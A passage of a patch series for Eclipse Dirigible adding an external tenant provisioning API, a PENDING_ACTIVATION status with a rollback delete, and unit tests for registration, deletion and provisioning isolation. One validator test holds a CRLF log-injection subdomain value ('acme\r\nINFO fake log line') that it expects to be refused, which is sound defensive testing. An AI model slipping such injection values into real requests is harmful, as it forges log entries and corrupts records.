+    private static Artefact artefact(String type, String location, ArtefactLifecycle lifecycle, String error) {
+        Artefact artefact = new Artefact(location, "customer", type, "", null) {};
+        artefact.setLifecycle(lifecycle);
+        artefact.setError(error);
+        return artefact;
+    }
+
+    /**
+     * Always call this BEFORE opening a {@code when(...)} on another mock: it stubs mocks of its own,
+     * and Mockito cannot nest that inside an unfinished stubbing.
+     *
+     * @param artefact the artefact the synchronizer's service reports
+     * @return the synchronizer
+     */
+    private static Synchronizer<?, ?> synchronizerReturning(Artefact artefact) {
+        Synchronizer<?, ?> synchronizer = mock(Synchronizer.class);
+        ArtefactService<?, ?> service = mock(ArtefactService.class);
+        doReturnArtefacts(service, artefact);
+        doReturnService(synchronizer, service);
+        return synchronizer;
+    }
+
+    @SuppressWarnings({"unchecked", "rawtypes"})
+    private static void doReturnArtefacts(ArtefactService<?, ?> service, Artefact artefact) {
+        when(((ArtefactService) service).getAll()).thenReturn(List.of(artefact));
+    }
+
+    @SuppressWarnings({"unchecked", "rawtypes"})
+    private static void doReturnService(Synchronizer<?, ?> synchronizer, ArtefactService<?, ?> service) {
+        when(((Synchronizer) synchronizer).getService()).thenReturn(service);
+    }
+}

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningApiEnabledConditionTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantProvisioningApiEnabledConditionTest.java
@@ -1,0 +1,53 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import org.eclipse.dirigible.commons.config.Configuration;
+import org.eclipse.dirigible.commons.config.DirigibleConfig;
+import org.junit.jupiter.api.AfterEach;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+
+/**
+ * The API is absent unless a deployment asked for it - the default has to be "off", or upgrading
+ * the platform would silently expose an endpoint that accepts database credentials.
+ */
+class TenantProvisioningApiEnabledConditionTest {
+
+    private final TenantProvisioningApiEnabledCondition condition = new TenantProvisioningApiEnabledCondition();
+
+    @BeforeEach
+    @AfterEach
+    void clearConfiguration() {
+        Configuration.remove(DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.getKey());
+    }
+
+    @Test
+    void theApiIsOffByDefault() {
+        assertFalse(condition.matches(null, null));
+    }
+
+    @Test
+    void theApiIsOnWhenTheDeploymentOptedIn() {
+        DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.setBooleanValue(true);
+
+        assertTrue(condition.matches(null, null));
+    }
+
+    @Test
+    void anExplicitFalseKeepsItOff() {
+        DirigibleConfig.TENANT_PROVISIONING_API_ENABLED.setBooleanValue(false);
+
+        assertFalse(condition.matches(null, null));
+    }
+}

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
@@ -11,14 +11,17 @@ package org.eclipse.dirigible.components.tenants.provisioning.external;
 
 import static org.junit.jupiter.api.Assertions.assertEquals;
 import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertNotEquals;
 import static org.junit.jupiter.api.Assertions.assertThrows;
 import static org.junit.jupiter.api.Assertions.assertTrue;
 import static org.mockito.ArgumentMatchers.any;
 import static org.mockito.Mockito.mock;
 import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.times;
 import static org.mockito.Mockito.verify;
 import static org.mockito.Mockito.when;
 
+import java.util.List;
 import java.util.Optional;
 
 import org.eclipse.dirigible.components.tenants.domain.Tenant;
@@ -26,6 +29,7 @@ import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
 import org.eclipse.dirigible.components.tenants.service.TenantService;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
+import org.mockito.ArgumentCaptor;
 import org.springframework.http.HttpStatus;
 import org.springframework.web.server.ResponseStatusException;
 
@@ -119,6 +123,41 @@ class TenantRegistrationServiceTest {
                                        .subdomain());
     }
 
+    /**
+     * Display names are not unique - two customers may both be "Acme Ltd" - so the tenant's artefact
+     * key must not be derived from one.
+     *
+     * <p>
+     * An artefact key is {@code type:location:name}; with a constant location the display name became
+     * the unique part, and the second tenant of that name hit the key index and left the caller with an
+     * unhandled 500. The tenant id is the identity, so it is what makes the key unique.
+     */
+    @Test
+    void twoTenantsMayShareADisplayName() {
+        service.register(ACME, parameter("Acme Ltd", null));
+        service.register("acme-two", parameter("Acme Ltd", null));
+
+        ArgumentCaptor<Tenant> captor = ArgumentCaptor.forClass(Tenant.class);
+        verify(tenantService, times(2)).save(captor.capture());
+        List<Tenant> saved = captor.getAllValues();
+        assertNotEquals(saved.get(0)
+                             .getKey(),
+                saved.get(1)
+                     .getKey(),
+                "tenants sharing a display name must still have distinct artefact keys");
+    }
+
+    /** Renaming a tenant onto a name another tenant already uses is likewise not a collision. */
+    @Test
+    void aTenantMayBeRenamedOntoAnotherTenantsName() {
+        Tenant existing = tenant(ACME, "Acme Ltd", ACME, TenantStatus.PENDING_ACTIVATION);
+        when(tenantService.findById(ACME)).thenReturn(Optional.of(existing));
+
+        service.register(ACME, parameter("Globex", null));
+
+        assertEquals("tenant:TENANT_PROVISIONING_API/acme:Globex", existing.getKey());
+    }
+
     @Test
     void anIdThatCannotBeAGroupSegmentIsRefused() {
         ResponseStatusException ex =
@@ -182,8 +221,9 @@ class TenantRegistrationServiceTest {
     }
 
     private static Tenant tenant(String id, String name, String subdomain, TenantStatus status) {
-        Tenant tenant = new Tenant(TenantRegistrationService.LOCATION, name, "", subdomain, status);
+        Tenant tenant = new Tenant(TenantRegistrationService.LOCATION + "/" + id, name, "", subdomain, status);
         tenant.setId(id);
+        tenant.updateKey();
         return tenant;
     }
 }

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
@@ -1,0 +1,169 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertThrows;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
+import java.util.Optional;
+
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.springframework.http.HttpStatus;
+import org.springframework.web.server.ResponseStatusException;
+
+/**
+ * Registration is what a retrying provisioner calls, possibly more than once for the same tenant,
+ * so the interesting cases are all about repetition and collision rather than the happy path.
+ */
+class TenantRegistrationServiceTest {
+
+    private static final String ACME = "acme";
+
+    private final TenantService tenantService = mock(TenantService.class);
+    private final TenantRegistrationService service =
+            new TenantRegistrationService(tenantService, new TenantInitializationStatusCalculator());
+
+    @BeforeEach
+    void echoSavedTenant() {
+        when(tenantService.save(any())).thenAnswer(invocation -> invocation.getArgument(0));
+        when(tenantService.findById(any())).thenReturn(Optional.empty());
+        when(tenantService.findBySubdomain(any())).thenReturn(Optional.empty());
+    }
+
+    @Test
+    void aNewTenantIsCreatedPendingActivation() {
+        TenantRegistrationService.RegistrationResult result = service.register(ACME, parameter("Acme Ltd", null));
+
+        assertTrue(result.created());
+        assertEquals(ACME, result.state()
+                                 .id());
+        assertEquals("Acme Ltd", result.state()
+                                       .name());
+        assertEquals(TenantStatus.PENDING_ACTIVATION, result.state()
+                                                            .status());
+        assertEquals(InitializationStatus.NOT_STARTED, result.state()
+                                                             .initialization()
+                                                             .status());
+    }
+
+    /** Subdomains are unused when tenants are resolved from token groups, but the column is unique. */
+    @Test
+    void theSubdomainDefaultsToTheTenantId() {
+        assertEquals(ACME, service.register(ACME, parameter("Acme Ltd", null))
+                                  .state()
+                                  .subdomain());
+    }
+
+    @Test
+    void anExplicitSubdomainIsKept() {
+        assertEquals("acme-eu", service.register(ACME, parameter("Acme Ltd", "acme-eu"))
+                                       .state()
+                                       .subdomain());
+    }
+
+    @Test
+    void registeringAnExistingTenantUpdatesItAndReportsItAsNotCreated() {
+        Tenant existing = tenant(ACME, "Acme Ltd", ACME, TenantStatus.PENDING_ACTIVATION);
+        when(tenantService.findById(ACME)).thenReturn(Optional.of(existing));
+
+        TenantRegistrationService.RegistrationResult result = service.register(ACME, parameter("Acme Corporation", null));
+
+        assertFalse(result.created());
+        assertEquals("Acme Corporation", result.state()
+                                               .name());
+        verify(tenantService).save(existing);
+    }
+
+    /** The status belongs to the activation, so a re-registration must not reset an active tenant. */
+    @Test
+    void registeringAnExistingTenantNeverChangesItsStatus() {
+        Tenant existing = tenant(ACME, "Acme Ltd", ACME, TenantStatus.PROVISIONED);
+        when(tenantService.findById(ACME)).thenReturn(Optional.of(existing));
+
+        TenantRegistrationService.RegistrationResult result = service.register(ACME, parameter("Acme Ltd", null));
+
+        assertEquals(TenantStatus.PROVISIONED, result.state()
+                                                     .status());
+    }
+
+    /** An omitted subdomain leaves the registered one alone rather than resetting it to the id. */
+    @Test
+    void registeringWithoutASubdomainKeepsTheRegisteredOne() {
+        Tenant existing = tenant(ACME, "Acme Ltd", "acme-eu", TenantStatus.PENDING_ACTIVATION);
+        when(tenantService.findById(ACME)).thenReturn(Optional.of(existing));
+
+        assertEquals("acme-eu", service.register(ACME, parameter("Acme Ltd", null))
+                                       .state()
+                                       .subdomain());
+    }
+
+    @Test
+    void anIdThatCannotBeAGroupSegmentIsRefused() {
+        ResponseStatusException ex =
+                assertThrows(ResponseStatusException.class, () -> service.register("acme.corp", parameter("Acme Ltd", null)));
+
+        assertEquals(HttpStatus.BAD_REQUEST, ex.getStatusCode());
+        verify(tenantService, never()).save(any());
+    }
+
+    @Test
+    void aSubdomainOwnedByAnotherTenantIsRefused() {
+        when(tenantService.findBySubdomain(ACME)).thenReturn(Optional.of(tenant("globex", "Globex", ACME, TenantStatus.PROVISIONED)));
+
+        ResponseStatusException ex = assertThrows(ResponseStatusException.class, () -> service.register(ACME, parameter("Acme Ltd", null)));
+
+        assertEquals(HttpStatus.CONFLICT, ex.getStatusCode());
+        assertTrue(ex.getReason()
+                     .contains("globex"));
+        verify(tenantService, never()).save(any());
+    }
+
+    /** Its own subdomain is not a collision - otherwise no registration could ever be repeated. */
+    @Test
+    void aTenantKeepingItsOwnSubdomainIsNotAConflict() {
+        Tenant existing = tenant(ACME, "Acme Ltd", ACME, TenantStatus.PENDING_ACTIVATION);
+        when(tenantService.findById(ACME)).thenReturn(Optional.of(existing));
+        when(tenantService.findBySubdomain(ACME)).thenReturn(Optional.of(existing));
+
+        assertFalse(service.register(ACME, parameter("Acme Ltd", null))
+                           .created());
+    }
+
+    @Test
+    void readingAnUnknownTenantIsANotFound() {
+        ResponseStatusException ex = assertThrows(ResponseStatusException.class, () -> service.read("nowhere"));
+
+        assertEquals(HttpStatus.NOT_FOUND, ex.getStatusCode());
+    }
+
+    private static RegisterTenantParameter parameter(String name, String subdomain) {
+        RegisterTenantParameter parameter = new RegisterTenantParameter();
+        parameter.setName(name);
+        parameter.setSubdomain(subdomain);
+        return parameter;
+    }
+
+    private static Tenant tenant(String id, String name, String subdomain, TenantStatus status) {
+        Tenant tenant = new Tenant(TenantRegistrationService.LOCATION, name, "", subdomain, status);
+        tenant.setId(id);
+        return tenant;
+    }
+}

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
@@ -128,6 +128,22 @@ class TenantRegistrationServiceTest {
         verify(tenantService, never()).save(any());
     }
 
+    /**
+     * A subdomain is matched out of a request's host name under the {@code SUBDOMAIN} strategy, so
+     * anything that is not a DNS label could never resolve - and, until it was refused here, arbitrary
+     * text including line breaks reached the log and the tenant row.
+     */
+    @Test
+    void aSubdomainThatIsNotADnsLabelIsRefused() {
+        for (String subdomain : new String[] {"acme.eu", "acme corp", "-acme", "acme\r\nINFO fake log line"}) {
+            ResponseStatusException ex = assertThrows(ResponseStatusException.class,
+                    () -> service.register(ACME, parameter("Acme Ltd", subdomain)), "expected [" + subdomain + "] to be refused");
+
+            assertEquals(HttpStatus.BAD_REQUEST, ex.getStatusCode());
+        }
+        verify(tenantService, never()).save(any());
+    }
+
     @Test
     void aSubdomainOwnedByAnotherTenantIsRefused() {
         when(tenantService.findBySubdomain(ACME)).thenReturn(Optional.of(tenant("globex", "Globex", ACME, TenantStatus.PROVISIONED)));

--- a/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
+++ b/components/core/core-tenants-provisioning/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantRegistrationServiceTest.java
@@ -38,14 +38,18 @@ class TenantRegistrationServiceTest {
     private static final String ACME = "acme";
 
     private final TenantService tenantService = mock(TenantService.class);
-    private final TenantRegistrationService service =
-            new TenantRegistrationService(tenantService, new TenantInitializationStatusCalculator());
+    private final TenantInitializationStatusCalculator statusCalculator = mock(TenantInitializationStatusCalculator.class);
+    private final TenantRegistrationService service = new TenantRegistrationService(tenantService, statusCalculator);
 
     @BeforeEach
     void echoSavedTenant() {
         when(tenantService.save(any())).thenAnswer(invocation -> invocation.getArgument(0));
         when(tenantService.findById(any())).thenReturn(Optional.empty());
         when(tenantService.findBySubdomain(any())).thenReturn(Optional.empty());
+        // the derivation itself has its own test; here it only has to distinguish the two cases
+        when(statusCalculator.calculate(any())).thenAnswer(invocation -> TenantInitializationState.of(
+                TenantStatus.PROVISIONED == ((Tenant) invocation.getArgument(0)).getStatus() ? InitializationStatus.COMPLETED
+                        : InitializationStatus.NOT_STARTED));
     }
 
     @Test

--- a/components/core/core-tenants/src/main/java/org/eclipse/dirigible/components/tenants/domain/TenantStatus.java
+++ b/components/core/core-tenants/src/main/java/org/eclipse/dirigible/components/tenants/domain/TenantStatus.java
@@ -17,5 +17,18 @@ public enum TenantStatus {
     /** The initial. */
     INITIAL,
     /** The provisioned. */
-    PROVISIONED
+    PROVISIONED,
+    /**
+     * Registered by an external provisioner, which owns the tenant's database user, schema and data
+     * source; the platform must not act on the tenant until that provisioner activates it.
+     *
+     * <p>
+     * The state is deliberately invisible to both halves of the built-in flow: the provisioner queries
+     * {@link #INITIAL} only, so it never races the external one by creating a user and a schema of its
+     * own, and {@code executeForEachTenant} queries {@link #PROVISIONED} only, so no synchronizer, job
+     * or listener reaches a tenant whose data source does not exist yet. Activation moves it to
+     * {@link #PROVISIONED}; until then it can also be deleted, which is the rollback path when
+     * provisioning is abandoned.
+     */
+    PENDING_ACTIVATION
 }

--- a/components/core/core-tenants/src/main/java/org/eclipse/dirigible/components/tenants/endpoint/TenantEndpoint.java
+++ b/components/core/core-tenants/src/main/java/org/eclipse/dirigible/components/tenants/endpoint/TenantEndpoint.java
@@ -11,7 +11,9 @@ package org.eclipse.dirigible.components.tenants.endpoint;
 
 import java.net.URI;
 import java.net.URISyntaxException;
+import java.util.EnumSet;
 import java.util.List;
+import java.util.Set;
 import java.util.UUID;
 
 import org.eclipse.dirigible.components.base.endpoint.BaseEndpoint;
@@ -134,18 +136,29 @@ public class TenantEndpoint {
                              .build();
     }
 
+    /** The statuses a tenant may be deleted in - see {@link #deleteTenant(String)}. */
+    private static final Set<TenantStatus> DELETABLE_STATUSES = EnumSet.of(TenantStatus.INITIAL, TenantStatus.PENDING_ACTIVATION);
+
     /**
      * Deletes the tenant.
+     *
+     * <p>
+     * A {@link TenantStatus#PENDING_ACTIVATION} tenant is deletable for the same reason an
+     * {@link TenantStatus#INITIAL} one is: nothing has been materialized for it yet, so removing it
+     * destroys no data. It is the rollback path of the tenant provisioning API - a provisioner that
+     * fails between registering a tenant and activating it can take its registration back instead of
+     * leaving a half-registered tenant behind. Deleting a {@link TenantStatus#PROVISIONED} tenant is
+     * still refused; that is deprovisioning, and it is a different problem.
      *
      * @param id the id of the tenant
      * @return the response entity
      * @throws URISyntaxException the URI syntax exception
      */
     @DeleteMapping("{id}")
-    public ResponseEntity<String> deleteDataSource(@PathVariable("id") String id) throws URISyntaxException {
+    public ResponseEntity<String> deleteTenant(@PathVariable("id") String id) throws URISyntaxException {
         Tenant tenant = tenantService.findById(id)
                                      .get();
-        if (TenantStatus.INITIAL.equals(tenant.getStatus())) {
+        if (DELETABLE_STATUSES.contains(tenant.getStatus())) {
             userService.findUsersByTenantId(tenant.getId())
                        .forEach(user -> userService.deleteUser(user.getId()));
             tenantService.delete(tenant);

--- a/components/core/core-tenants/src/test/java/org/eclipse/dirigible/components/tenants/endpoint/TenantEndpointTest.java
+++ b/components/core/core-tenants/src/test/java/org/eclipse/dirigible/components/tenants/endpoint/TenantEndpointTest.java
@@ -1,0 +1,80 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.endpoint;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
+import java.net.URISyntaxException;
+import java.util.List;
+import java.util.Optional;
+
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.eclipse.dirigible.components.tenants.service.UserService;
+import org.junit.jupiter.api.Test;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.ResponseEntity;
+
+/**
+ * Which tenants may be deleted. A tenant that never materialized anything can be taken back; a
+ * provisioned one cannot, because deleting it would be deprovisioning without deprovisioning steps.
+ */
+class TenantEndpointTest {
+
+    private final TenantService tenantService = mock(TenantService.class);
+    private final UserService userService = mock(UserService.class);
+    private final TenantEndpoint endpoint = new TenantEndpoint(tenantService, userService);
+
+    @Test
+    void anInitialTenantIsDeleted() throws URISyntaxException {
+        assertDeleted(TenantStatus.INITIAL);
+    }
+
+    /** The rollback path of the tenant provisioning API. */
+    @Test
+    void aPendingActivationTenantIsDeleted() throws URISyntaxException {
+        assertDeleted(TenantStatus.PENDING_ACTIVATION);
+    }
+
+    @Test
+    void aProvisionedTenantIsRefused() throws URISyntaxException {
+        Tenant tenant = tenant(TenantStatus.PROVISIONED);
+        when(tenantService.findById("acme")).thenReturn(Optional.of(tenant));
+
+        ResponseEntity<String> response = endpoint.deleteTenant("acme");
+
+        assertEquals(HttpStatus.BAD_REQUEST, response.getStatusCode());
+        verify(tenantService, never()).delete(any());
+        verify(userService, never()).deleteUser(any());
+    }
+
+    private void assertDeleted(TenantStatus status) throws URISyntaxException {
+        Tenant tenant = tenant(status);
+        when(tenantService.findById("acme")).thenReturn(Optional.of(tenant));
+        when(userService.findUsersByTenantId("acme")).thenReturn(List.of());
+
+        ResponseEntity<String> response = endpoint.deleteTenant("acme");
+
+        assertEquals(HttpStatus.NO_CONTENT, response.getStatusCode());
+        verify(tenantService).delete(tenant);
+    }
+
+    private static Tenant tenant(TenantStatus status) {
+        Tenant tenant = new Tenant("-", "Acme", "", "acme", status);
+        tenant.setId("acme");
+        return tenant;
+    }
+}

--- a/components/core/core-tenants/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/TenantsProvisionerTest.java
+++ b/components/core/core-tenants/src/test/java/org/eclipse/dirigible/components/tenants/provisioning/TenantsProvisionerTest.java
@@ -1,0 +1,96 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
+import java.util.Set;
+
+import org.eclipse.dirigible.components.base.tenant.TenantPostProvisioningStep;
+import org.eclipse.dirigible.components.base.tenant.TenantProvisioningStep;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.eclipse.dirigible.components.tenants.tenant.TenantFactory;
+import org.junit.jupiter.api.Test;
+
+/**
+ * The built-in provisioner owns {@link TenantStatus#INITIAL} tenants and nothing else.
+ *
+ * <p>
+ * This is the invariant that lets an external provisioner own a tenant end to end: a tenant it
+ * registered as {@link TenantStatus#PENDING_ACTIVATION} must never be picked up here, or the
+ * platform would create a database user and a schema of its own alongside the ones the external
+ * provisioner created - two owners for one tenant's data, and a data source pointing at whichever
+ * of them won.
+ */
+class TenantsProvisionerTest {
+
+    private final TenantService tenantService = mock(TenantService.class);
+    private final TenantProvisioningStep provisioningStep = mock(TenantProvisioningStep.class);
+    private final TenantPostProvisioningStep postProvisioningStep = mock(TenantPostProvisioningStep.class);
+
+    private final TenantsProvisioner provisioner =
+            new TenantsProvisioner(tenantService, Set.of(provisioningStep), Set.of(postProvisioningStep), new TenantFactory());
+
+    @Test
+    void onlyInitialTenantsAreQueried() {
+        when(tenantService.findByStatus(TenantStatus.INITIAL)).thenReturn(Set.of(tenant("acme", TenantStatus.INITIAL)));
+
+        provisioner.provision();
+
+        verify(tenantService).findByStatus(TenantStatus.INITIAL);
+        verify(tenantService, never()).findByStatus(TenantStatus.PENDING_ACTIVATION);
+        verify(tenantService, never()).findByStatus(TenantStatus.PROVISIONED);
+    }
+
+    @Test
+    void anInitialTenantIsProvisionedAndMarkedProvisioned() {
+        Tenant acme = tenant("acme", TenantStatus.INITIAL);
+        when(tenantService.findByStatus(TenantStatus.INITIAL)).thenReturn(Set.of(acme));
+
+        provisioner.provision();
+
+        verify(provisioningStep).execute(any());
+        verify(postProvisioningStep).execute();
+        verify(tenantService).save(acme);
+        assertEquals(TenantStatus.PROVISIONED, acme.getStatus());
+    }
+
+    /**
+     * The externally provisioned tenant is invisible: the provisioner finds nothing to do, so it runs
+     * no provisioning step against it and - since nothing was provisioned - no post-provisioning step
+     * either.
+     */
+    @Test
+    void aPendingActivationTenantIsNeverProvisioned() {
+        Tenant pending = tenant("globex", TenantStatus.PENDING_ACTIVATION);
+        when(tenantService.findByStatus(TenantStatus.INITIAL)).thenReturn(Set.of());
+        when(tenantService.findByStatus(TenantStatus.PENDING_ACTIVATION)).thenReturn(Set.of(pending));
+
+        provisioner.provision();
+
+        verify(provisioningStep, never()).execute(any());
+        verify(postProvisioningStep, never()).execute();
+        verify(tenantService, never()).save(any());
+        assertEquals(TenantStatus.PENDING_ACTIVATION, pending.getStatus());
+    }
+
+    private static Tenant tenant(String id, TenantStatus status) {
+        Tenant tenant = new Tenant("-", id, "", id, status);
+        tenant.setId(id);
+        return tenant;
+    }
+}

--- a/components/core/core-tenants/src/test/java/org/eclipse/dirigible/components/tenants/tenant/TenantContextImplTest.java
+++ b/components/core/core-tenants/src/test/java/org/eclipse/dirigible/components/tenants/tenant/TenantContextImplTest.java
@@ -1,0 +1,77 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.tenant;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.verify;
+import static org.mockito.Mockito.when;
+
+import java.util.HashSet;
+import java.util.Set;
+
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.junit.jupiter.api.Test;
+
+/**
+ * The per-tenant fan-out reaches provisioned tenants and the default tenant, and nothing else.
+ *
+ * <p>
+ * Every multitenant synchronizer materializes its artefacts through this fan-out, so a tenant it
+ * includes is a tenant whose schema is about to be written to. A
+ * {@link TenantStatus#PENDING_ACTIVATION} tenant has no data source registered yet - it is being
+ * provisioned from the outside - so including it would fail every artefact of the pass. This is the
+ * second half of the invariant {@code TenantsProvisionerTest} pins from the other side.
+ */
+class TenantContextImplTest {
+
+    private final TenantService tenantService = mock(TenantService.class);
+    private final TenantContextImpl tenantContext = new TenantContextImpl(tenantService);
+
+    @Test
+    void theFanOutCoversProvisionedTenantsAndTheDefaultOne() {
+        when(tenantService.findByStatus(TenantStatus.PROVISIONED)).thenReturn(Set.of(tenant("acme", TenantStatus.PROVISIONED)));
+
+        Set<String> visited = new HashSet<>();
+        tenantContext.executeForEachTenant(() -> visited.add(tenantContext.getCurrentTenant()
+                                                                          .getId()));
+
+        assertEquals(2, visited.size(), "expected the provisioned tenant and the default one, got " + visited);
+        assertTrue(visited.contains("acme"));
+        assertTrue(visited.contains(TenantImpl.getDefaultTenant()
+                                              .getId()));
+    }
+
+    @Test
+    void aPendingActivationTenantIsNeverVisited() {
+        when(tenantService.findByStatus(TenantStatus.PROVISIONED)).thenReturn(Set.of());
+        when(tenantService.findByStatus(TenantStatus.PENDING_ACTIVATION)).thenReturn(
+                Set.of(tenant("globex", TenantStatus.PENDING_ACTIVATION)));
+
+        Set<String> visited = new HashSet<>();
+        tenantContext.executeForEachTenant(() -> visited.add(tenantContext.getCurrentTenant()
+                                                                          .getId()));
+
+        assertFalse(visited.contains("globex"));
+        verify(tenantService).findByStatus(TenantStatus.PROVISIONED);
+        verify(tenantService, never()).findByStatus(TenantStatus.INITIAL);
+    }
+
+    private static Tenant tenant(String id, TenantStatus status) {
+        Tenant tenant = new Tenant("-", id, "", id, status);
+        tenant.setId(id);
+        return tenant;
+    }
+}

--- a/components/data/data-sources/src/main/java/org/eclipse/dirigible/components/data/sources/service/DataSourceService.java
+++ b/components/data/data-sources/src/main/java/org/eclipse/dirigible/components/data/sources/service/DataSourceService.java
@@ -10,6 +10,7 @@
 package org.eclipse.dirigible.components.data.sources.service;
 
 import java.util.List;
+import java.util.Optional;
 import org.eclipse.dirigible.components.base.artefact.BaseArtefactService;
 import org.eclipse.dirigible.components.data.sources.domain.DataSource;
 import org.eclipse.dirigible.components.data.sources.repository.DataSourceRepository;
@@ -48,6 +49,22 @@ public class DataSourceService extends BaseArtefactService<DataSource, Long> {
         DataSource savedDataSource = super.save(datasource);
         dataSourceListeners.forEach(l -> l.onSave(savedDataSource));
         return savedDataSource;
+    }
+
+    /**
+     * Finds a data source by name without throwing when there is none.
+     *
+     * <p>
+     * {@link #findByName(String)} answers a missing artefact with an exception, which is right for a
+     * caller that knows the artefact exists. An upsert does not: "is it there yet" is its normal
+     * question, asked once per call.
+     *
+     * @param name the data source name
+     * @return the data source, or empty
+     */
+    @Transactional(readOnly = true)
+    public Optional<DataSource> findOptionalByName(String name) {
+        return getRepo().findByName(name);
     }
 
     /**

--- a/components/group/group-core/pom.xml
+++ b/components/group/group-core/pom.xml
@@ -72,6 +72,10 @@
         </dependency>
         <dependency>
             <groupId>org.eclipse.dirigible</groupId>
+            <artifactId>dirigible-components-core-tenants-provisioning</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.eclipse.dirigible</groupId>
             <artifactId>dirigible-components-core-tracing</artifactId>
         </dependency>
         

--- a/components/pom.xml
+++ b/components/pom.xml
@@ -28,6 +28,7 @@
         <module>core/core-spring</module>
         <module>core/core-project</module>
         <module>core/core-tenants</module>
+        <module>core/core-tenants-provisioning</module>
         <module>core/core-tracing</module>
         <module>core/core-java</module>
